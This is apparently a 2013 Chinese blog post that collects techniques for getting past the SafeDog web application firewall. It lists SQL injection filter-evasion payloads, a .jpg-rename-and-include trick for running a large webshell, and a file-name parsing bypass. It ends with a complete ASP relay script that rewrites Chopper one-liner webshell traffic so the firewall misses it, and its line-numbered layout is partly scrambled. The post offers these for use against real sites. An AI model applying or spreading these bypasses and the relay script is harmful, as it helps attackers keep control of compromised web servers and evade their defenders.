您的位置:首页 > 其它

过安全狗技术总汇

2013-01-30 22:58 162 查看
作者:鬼哥

1.过注入

2.过大马被阻拦访问

3.过菜刀连接一句话被拦截

4.过1.asp;.jpg这样的文件

其他我没遇到了。。

现在一点一点讲:

1.过注入

方法一:a.asp?aaa=%00&id=sql语句

方法二: a.asp?id=sql语句 里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin

2.过大马被阻拦访问

方法一:上传一个大马 然后访问http://sss.com/dama.asp 访问后出现拦截。

那么解决方法 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –> 这样再访问da.asp 就不会被拦截了。

3.过菜刀连接一句话被拦截

方法一:不用菜刀连接一句话,用别的一句话连接端。

方法二:中转下连接菜刀,把过滤掉的词替换掉。

4.过1.asp;.jpg这样的文件拦截

方法一:;1.asp;.jpg

方法二:保密

具体就为大家总结这么多了,安全狗 反正基本可以无视了!!

大家还有什么要补充的可以发在下面!

下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录

然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址

然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型

例如:http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码

这样输入就菜刀

这个脚本暂时支持.php .aspx的一句话连接 .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!

1
<%
2
'饶过的原理,抓菜刀连接webshell的包
然后研究安全狗过滤了哪些关键字 中转替换掉那些过滤的关键字 就成!
3
JmStr=Replace(Request.Form,
"$_POST"
,
"$_REQUEST"
)
4
JmStr=Replace(JmStr,
"->|"
,
"-->|"
)
5
JmStr=Replace(JmStr,
"@eval("
,
"@eval
("
)
6
JmStr=Replace(JmStr,
"System.Convert.FromBase64String"
,
"System.Convert.
FromBase64String"
)
7
JMUrl=request(
"dz"
)
8
response.write
request(
"dz"
)
9
JmRef=JMUrl
10
JmCok=
""
11
response.write
PostData(JMUrl,JmStr,JmCok,JmRef)
12
Function
PostData(PostUrl,PostStr,PostCok,PostRef)
13
Dim
Http
14
Set
Http = Server.CreateObject(
"msxml2.serverXMLHTTP"
)
15
With
Http
16
.Open
"POST"
,PostUrl,False
17
.SetRequestHeader
"Content-Length"
,Len(PostStr)
18
.SetRequestHeader
"Content-Type"
,
"application/x-www-form-urlencoded"
19
.SetRequestHeader
"Referer"
,PostRef
20
'.SetRequestHeader
"Cookie"
,PostCok
21
.Send
PostStr
22
PostData
= .ResponseBody
23
End
With
24
Set
Http = Nothing
25
PostData
=bytes2BSTR(PostData)
26
End
Function
27
28
Function
bytes2BSTR(vIn)
29
Dim
strReturn
30
Dim
I, ThisCharCode, NextCharCode
31
strReturn
=
""
32
For
I = 1 To LenB(vIn)
33
ThisCharCode
= AscB(MidB(vIn, I, 1))
34
If
ThisCharCode < &H80 Then
35
strReturn
=strReturn & 
Chr
(ThisCharCode)
36
Else
37
NextCharCode
= AscB(MidB(vIn, I + 1, 1))
38
strReturn
=strReturn & 
Chr
(CLng(ThisCharCode)
* &H100 + CInt(NextCharCode))
39
I
= I + 1
40
End
If
41
Next
42
bytes2BSTR
= strReturn
43
End
Function
44
45
Function
URLEncoding(vstrin)
46
strReturn=
""
47
Dim
i
48
For
i=1 To Len(vstrin)
49
ThisChr=Mid(vstrin,i,1)
50
if
Abs
(Asc(ThisChr))<
&HFF Then
51
strReturn=strReturn
& ThisChr
52
Else
53
InnerCode=Asc(ThisChr)
54
If
InnerCode<0 Then
55
InnerCode=InnerCode
+ &H10000
56
End
If
57
Hight1=(InnerCode
And &HFF00) \&HFF
58
Low1=InnerCode
And &HFF
59
strReturn=strReturn
&
"%"
&
Hex(Hight1) &
"%"
&
Hex(Low1)
60
End
if
61
Next
62
strReturn=Replace(strReturn,
chr
(32),
"%20"
)
'转换空格,如果网站过滤了空格,尝试用
/**/
来代替%20
63
strReturn=Replace(strReturn,
chr
(43),
"%2B"
)
'J6156增加转换+字符
64
'strReturn=Replace(strReturn,过滤字符,"转换为字符")
'
在此增加要过滤的代码
65
URLEncoding=strReturn
66
End
Function
67
68
%>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: